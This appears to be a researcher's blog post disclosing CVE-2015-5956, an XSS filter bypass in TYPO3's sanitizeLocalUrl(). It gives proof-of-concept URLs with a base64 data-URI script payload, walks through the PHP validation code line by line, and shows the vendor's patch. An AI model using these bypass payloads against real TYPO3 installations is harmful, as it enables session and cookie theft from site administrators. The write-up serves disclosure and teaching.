CVE-2015-5956: Bypassing the TYPO3 Core XSS Filter

TYPO3 is the most widely used enterprise content management system with more than 500.000 installations. I have recently discovered a Non-Persistent Cross-Site Scripting vulnerability in its core and disclosed the details of the vulnerability publicly as CVE-2015-5956.

This blog article should give you some insights about the vulnerability, because it’s not only a simple XSS, but a rather nice XSS filter bypass. But before digging into PHP stuff, I’d like to outline the really great work by the TYPO3 security team!!11 This was definitely one of the best and most efficient coordinations I have ever done. Special thanks go out to Helmut Hummel, who was always professional and transparent about TYPO3’s work on an update.

Vulnerability Description and PoCs

The Typo3 version branches 6.x and 4.x (and 7.x in theory) are vulnerable to an authenticated, non-persistent Cross-Site Scripting vulnerability when user-supplied input is processed by the sanitizeLocalUrl() function. While there is already a XSS filter in place, it is possible to mitigate it by using a data URI with a base64 encoded payload.

The payload is slightly different through the vulnerable branches, 6.x needs a space in the data URI payload, while 4.x doesn’t. In the following proof of concepts, the javascript <script>alert('XSS')</script> is used as a base64 encoded data URI in the “returnUrl” and “redirect_url” parameters, which can be found throughout Typo3.

The first proof of concept exploits the vulnerability using the “returnUrl” parameter by forging the back link in the Typo3-backend “Show record history” module:

https://example.com/typo3/show_rechis.php?returnUrl=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

An authenticated victim with proper access rights to access the module, and who follows the URL and afterwards clicks on the back link:

Will be exploited like this (pretty high amount of social engineering is needed):

With the 6.x Branch Proof-of-Concept the victim does not need to be logged into the backend. The attacker simply sends him/her the following link:

https://example.com/typo3/index.php?redirect_url=data:text/html;base64,%20PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

By clicking on this link, the victim is redirected to the login page of Typo3:

After entering valid login credentials, the victim gets exploited like in the previous example, because Typo3 uses the “redirect_url” parameter in the HTTP Location header to forward the user. This heavily lowers the amount of social engineering needed to prepare this attack.

The 7.x branch is basically vulnerable too, but the attacker additionally needs to know a secret token (moduleToken), which is included in every request in order to successfully exploit the vulnerability, which makes exploitation unfeasible.

https://example.com/typo3/index.php?M=record_history&moduleToken=260ab28ad4973d29e0a77d2f799e79ca3028de28&element=tt_content%3A1&returnUrl=&returnUrl=data:%20text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

The vulnerability can be used to temporarily embed arbitrary script code into the context of the Typo3 backend interface, which offers a wide range of possible attacks such as stealing cookies or attacking the browser and its components. Since this XSS is not only a simple one, but a rather nice filterbypass, the following root cause analysis whill show you how the bypass happens. It is based on the 6.x branch.

Root Cause Analysis

Let’s have a look at the file /typo3/sysext/core/Classes/Utility/GeneralUtility.php which causes all the trouble and go through it step by step to find out how the filter is bypassed:

 
* Checks if a given string is a valid frame URL to be loaded in the
 * backend.
 *
 * @param string $url potential URL to check
 * @return string either $url if $url is considered to be harmless, or an
 */
static public function sanitizeLocalUrl($url = '') {
    $sanitizedUrl = '';
    $decodedUrl = rawurldecode($url);
    if (!empty($url) && self::removeXSS($decodedUrl) === $decodedUrl) {
        $testAbsoluteUrl = self::resolveBackPath($decodedUrl);
        $testRelativeUrl = self::resolveBackPath(self::dirname(self::getIndpEnv('SCRIPT_NAME')) . '/' . $decodedUrl);
        // Pass if URL is on the current host:
        if (self::isValidUrl($decodedUrl)) {
            if (self::isOnCurrentHost($decodedUrl) && strpos($decodedUrl, self::getIndpEnv('TYPO3_SITE_URL')) === 0) {
                $sanitizedUrl = $url;
            }
        } elseif (self::isAbsPath($decodedUrl) && self::isAllowedAbsPath($decodedUrl)) {
            $sanitizedUrl = $url;
        } elseif (strpos($testAbsoluteUrl, self::getIndpEnv('TYPO3_SITE_PATH')) === 0 && $decodedUrl[0] === '/') {
            $sanitizedUrl = $url;
        } elseif (strpos($testRelativeUrl, self::getIndpEnv('TYPO3_SITE_PATH')) === 0 && $decodedUrl[0] !== '/') {
            $sanitizedUrl = $url;
        }
    }
    if (!empty($url) && empty($sanitizedUrl)) {
        self::sysLog('The URL "' . $url . '" is not considered to be local and was denied.', 'Core', self::SYSLOG_SEVERITY_NOTICE);
    }
    return $sanitizedUrl;
}

Initially, the $url argument of the sanitizeLocalUrl() function contains the XSS payload feeded through one of the vulnerable parameters – .e.g.:

data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

This is then passed through a rawurldecode() call, which simply replaces all % occurences with their literal chars, but since there are none, the original payload stays the same, but is copied to $decodedUrl. The next function removeXSS() is a little bit more complex, but in the first step just includes the third party external class “removeXSS” followed by the process() call on the payload-string:

/**
 * Wrapper for the RemoveXSS function.
 * Removes potential XSS code from an input string.
 *
 * Using an external class by Travis Puderbaugh <kallahar@quickwired.com>
 *
 * @param string $string Input string
 * @return string Input string with potential XSS code removed
 */
static public function removeXSS($string) {
    require_once PATH_typo3 . 'contrib/RemoveXSS/RemoveXSS.php';
    $string = \RemoveXSS::process($string);
    return $string;
}
</kallahar@quickwired.com>

The class is too complex to describe it in detail here, but to summarize how it’s working: It basically replaces potential Cross-site scripting payloads with an “”. So if you feed it with a typical alert-payload like

 "><script>alert('XSS')</script>

It would output something like:

 "><sc<x>ript>alert('XSS')</script>

Even the use of the encoded version of the payload:

"><script>alert('XSS')</script>

would result in:

"><script>alert('XSS')</script>

Back to the sanitizeLocalUrl() function, the first if-check does only continue if the $url is not empty and its decoded version is equal (and of the same type) like the result from the removeXSS() call:

if (!empty($url) && self::removeXSS($decodedUrl) === $decodedUrl)

This means that if the payload is modified by the removeXSS() function in any way, the if-check evaluates to false and the subsequent commands are not executed. The sanitizeLocalUrl() then returns an empty string, which was set right at the beginning and wasn’t modified up to the end. This however results in the payload being removed from the request. Bad boy.

If you pass the payload through the removeXSS() function:

data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

It simply outputs the same string, because neither a typical XSS string was found nor any encoded strings are present, which means the if-statement evaluates to true. First filter bypassed successfully 🙂 !

Up next a series of URL validation checks:

$testAbsoluteUrl = self::resolveBackPath($decodedUrl);

The resolveBackPath() function checks whether the payload is an absolute URL (in form of a present double dot):

/**
 * Resolves "../" sections in the input path string.
 * For example "fileadmin/directory/../other_directory/" will be resolved to "fileadmin/other_directory/"
 *
 * @param string $pathStr File path in which "/../" is resolved
 * @return string
 */
static public function resolveBackPath($pathStr) {
    if (strpos($pathStr, '..') === FALSE) {
        return $pathStr;
    }
    $parts = explode('/', $pathStr);
    $output = array();
    $c = 0;
    foreach ($parts as $part) {
        if ($part === '..') {
            if ($c) {
                array_pop($output);
                --$c;
            } else {
                $output[] = $part;
            }
        } else {
            ++$c;
            $output[] = $part;
        } 
    }
    return implode('/', $output);
}

But since the payload does not contain the string “..”, the first if-check in the resolveBackPath() function already evaluates to false, so the input is returned unmodified.

The subsequent check for the relative URL is a bit more complex again. It basically gets the executing “SCRIPT_NAME” (in this example: /typo3/index.php), and passes it to the dirname() function, which returns the directory part of the path, without the trailing / – so in this case “/typo3”. Finally a slash followed by the payload is added.

$testRelativeUrl = self::resolveBackPath(self::dirname(self::getIndpEnv('SCRIPT_NAME')) . '/' . $decodedUrl);

Therefore a string like the following is constructed:

/typo3/data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

It is passed through the resolveBackPath() function again, and also returns the same value, because the double-dot string is not found.

The next if-conditions are the final thing that needs to be bypassed. The first and most important one, because it is the reason, why a space is needed in the payload, is the isValidUrl() function call:

if (self::isValidUrl($decodedUrl)) {
    if (self::isOnCurrentHost($decodedUrl) && strpos($decodedUrl, self::getIndpEnv('TYPO3_SITE_URL')) === 0) {
        $sanitizedUrl = $url;
    }

Quite a couple of checks are performed here. The first if-check is skipped, because $parsedUrl is not null and the scheme is also resolved (it’s actually just “data”). The next if-check tries to identify whether the first part of the string starts with the scheme “data://”. Since the payload does not start with “data://” the statement evaluates to true and the $url string is str_replaced() to return “data://text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=”.The next buildUrl() call is used to construct a scheme-valid string from the parsed argument. It finally also resolves the payload to “data://text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=”.

/**
 * Checks if a given string is a Uniform Resource Locator (URL).
 *
 * On seriously malformed URLs, parse_url may return FALSE and emit an
 * E_WARNING.
 *
 * filter_var() requires a scheme to be present.
 *
 * http://www.faqs.org/rfcs/rfc2396.html
 * Scheme names consist of a sequence of characters beginning with a
 * lower case letter and followed by any combination of lower case letters,
 * digits, plus ("+"), period ("."), or hyphen ("-").  For resiliency,
 * programs interpreting URI should treat upper case letters as equivalent to
 * lower case in scheme names (e.g., allow "HTTP" as well as "http").
 * scheme = alpha *( alpha | digit | "+" | "-" | "." )
 *
 * Convert the domain part to punicode if it does not look like a regular
 * domain name. Only the domain part because RFC3986 specifies the the rest of
 * the url may not contain special characters:
 * http://tools.ietf.org/html/rfc3986#appendix-A
 *
 * @param string $url The URL to be validated
 * @return boolean Whether the given URL is valid
 */
static public function isValidUrl($url) {
    $parsedUrl = parse_url($url);
    if (!$parsedUrl || !isset($parsedUrl['scheme'])) {
        return FALSE;
    }
    // HttpUtility::buildUrl() will always build urls with ://
    // our original $url might only contain : (e.g. mail:)
    // so we convert that to the double-slashed version to ensure
    // our check against the $recomposedUrl is proper
    if (!self::isFirstPartOfStr($url, $parsedUrl['scheme'] . '://')) {
        $url = str_replace($parsedUrl['scheme'] . ':', $parsedUrl['scheme'] . '://', $url);
    }
    $recomposedUrl = HttpUtility::buildUrl($parsedUrl);
    if ($recomposedUrl !== $url) {
        // The parse_url() had to modify characters, so the URL is invalid
        return FALSE;
    }
    if (isset($parsedUrl['host']) && !preg_match('/^[a-z0-9.\-]*$/i', $parsedUrl['host'])) {
        $parsedUrl['host'] = self::idnaEncode($parsedUrl['host']);
    }
    return filter_var(HttpUtility::buildUrl($parsedUrl), FILTER_VALIDATE_URL) !== FALSE;
}

The next if-check simply checks whether the previous instructions have modified the original payload (data: text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=).

if ($recomposedUrl !== $url) {
    // The parse_url() had to modify characters, so the URL is invalid
    return FALSE;
}

Since both strings are still same, the function goes on and checks if the host-part of the string is valid. But it’s not even there, so the first isset() of the if-check already returns false. Due to the fact that PHP uses short-circuit evaluations, the last condition is not evaluated (in case of this &&) when the first condition already evaluates to false.

if (isset($parsedUrl['host']) && !preg_match('/^[a-z0-9.\-]*$/i', $parsedUrl['host'])) {
      $parsedUrl['host'] = self::idnaEncode($parsedUrl['host']);
}

The last part is the return instruction, which is quite important because it deals with the needed space!

return filter_var(HttpUtility::buildUrl($parsedUrl), FILTER_VALIDATE_URL) !== FALSE;

To understand what is actually happening here, you must keep in mind that “FILTER_VALIDATE_URL” is one of the official PHP filters. Quoted from their page:

Validates value as URL (according to » http://www.faqs.org/rfcs/rfc2396), optionally with required components. Beware a valid URL may not specify the HTTP protocol http:// so further validation may be required to determine the URL uses an expected protocol, e.g. ssh:// or mailto:. Note that the function will only find ASCII URLs to be valid; internationalized domain names (containing non-ASCII characters) will fail.

So RFC2396 describes how a URL should look like and includes a part about whitepaces – quoted from their page:

The space character is excluded because significant spaces may disappear and insignificant spaces may be introduced when URI are transcribed or typeset or subjected to the treatment of word-processing programs. Whitespace is also used to delimit URI in many contexts.

All in all, whitepsaces are bad, but most browsers accept them anyways. Let’s see what happens when you supply the two payloads to the filter_var() function, with just a space in difference:

data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

returns the url string, which means it is conform with RFC2396.

data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

returns “false”, because there’s a whitespace in the payload. And that’s what is needed to bypass the filter. !

Back at the second if check in the sanitizeLocalUrl() function:

elseif (self::isAbsPath($decodedUrl) && self::isAllowedAbsPath($decodedUrl)) {
    $sanitizedUrl = $url;

It checks via the isAbsPath() function whether the payload (URL) is absolute or relative, but also returns false because all statements resolve to false:

/**
 * Checks if the $path is absolute or relative (detecting either '/' or 'x:/' as first part of string) and returns TRUE if so.
 *
 * @param string $path File path to evaluate
 * @return boolean
 */
static public function isAbsPath($path) {
    return $path[0] === '/' || TYPO3_OS === 'WIN' && (strpos($path, ':/') === 1 || strpos($path, ':\') === 1);
}

The third if checks whether the TYPO3_SITE_PATH can be found in the $testAbsoluteUrl string. Just to remember, $testAbsoluteUrl is the actual payload:

data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

elseif (strpos($testAbsoluteUrl, self::getIndpEnv('TYPO3_SITE_PATH')) === 0 && $decodedUrl[0] === '/') {
    $sanitizedUrl = $url;

The TYPO3_SITE_PATH string always resolves to the directory of the frontend website. So in this example it’s just “/”.

TYPO3_SITE_PATH =       [path_dir] of the TYPO3 website frontend

That leads to the first strpos() to evaluate to false, because the first “/” is not found at position 0. Due to short-circuit evaluations, the last check isn’t performed anymore.

The last if-check performs the same operation like the previous one, but on the $testRelativeUrl string, which is

/typo3/data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

The first strpos condition evaluates to true, because the first character of the $testRelativeUrl string is the TYPO3_SITE_PATH (“/”). The second condition, which checks whether the first char of the ORIGINAL payload is not a slash also evaluates to true.

elseif (strpos($testRelativeUrl, self::getIndpEnv('TYPO3_SITE_PATH')) === 0 && $decodedUrl[0] !== '/') {
        $sanitizedUrl = $url;
        }

Pwned. This means that the last if-check assigns the input payload to $sanitizedUrl, which is in the end returned and echoed back to the backend.

How did Typo3 fix the bug?

Typo3 changed the following file with their patch: /typo3/sysext/core/Classes/Utility/GeneralUtility.php

Let’s have a quick look at the patch, which Typo3 has published to fix the isse, which is just a small one. Two lines have been changed in order to address the issue:

Another parse_url() call was added to split up the payload (URL) into its different parts
The last elseif-check was modified to verify the URL scheme (e.g. http or https) is present.

/**
 * Checks if a given string is a valid frame URL to be loaded in the
 * backend.
 *
 * @param string $url potential URL to check
 * @return string either $url if $url is considered to be harmless, or an
 */
static public function sanitizeLocalUrl($url = '') {
    $sanitizedUrl = '';
    $decodedUrl = rawurldecode($url);
    if (!empty($url) && self::removeXSS($decodedUrl) === $decodedUrl) {
        $parsedUrl = parse_url($decodedUrl);
        $testAbsoluteUrl = self::resolveBackPath($decodedUrl);
        $testRelativeUrl = self::resolveBackPath(self::dirname(self::getIndpEnv('SCRIPT_NAME')) . '/' . $decodedUrl);
        // Pass if URL is on the current host:
        if (self::isValidUrl($decodedUrl)) {
            if (self::isOnCurrentHost($decodedUrl) && strpos($decodedUrl, self::getIndpEnv('TYPO3_SITE_URL')) === 0) {
                $sanitizedUrl = $url;
            }
        } elseif (self::isAbsPath($decodedUrl) && self::isAllowedAbsPath($decodedUrl)) {
            $sanitizedUrl = $url;
        } elseif (strpos($testAbsoluteUrl, self::getIndpEnv('TYPO3_SITE_PATH')) === 0 && $decodedUrl[0] === '/') {
            $sanitizedUrl = $url;
        } elseif (empty($parsedUrl['scheme']) && strpos($testRelativeUrl, self::getIndpEnv('TYPO3_SITE_PATH')) === 0 && $decodedUrl[0] !== '/') {
            $sanitizedUrl = $url;
        }
    }
    if (!empty($url) && empty($sanitizedUrl)) {
        self::sysLog('The URL "' . $url . '" is not considered to be local and was denied.', 'Core', self::SYSLOG_SEVERITY_NOTICE);
    }
    return $sanitizedUrl;
}

Good work. Mission accomplished.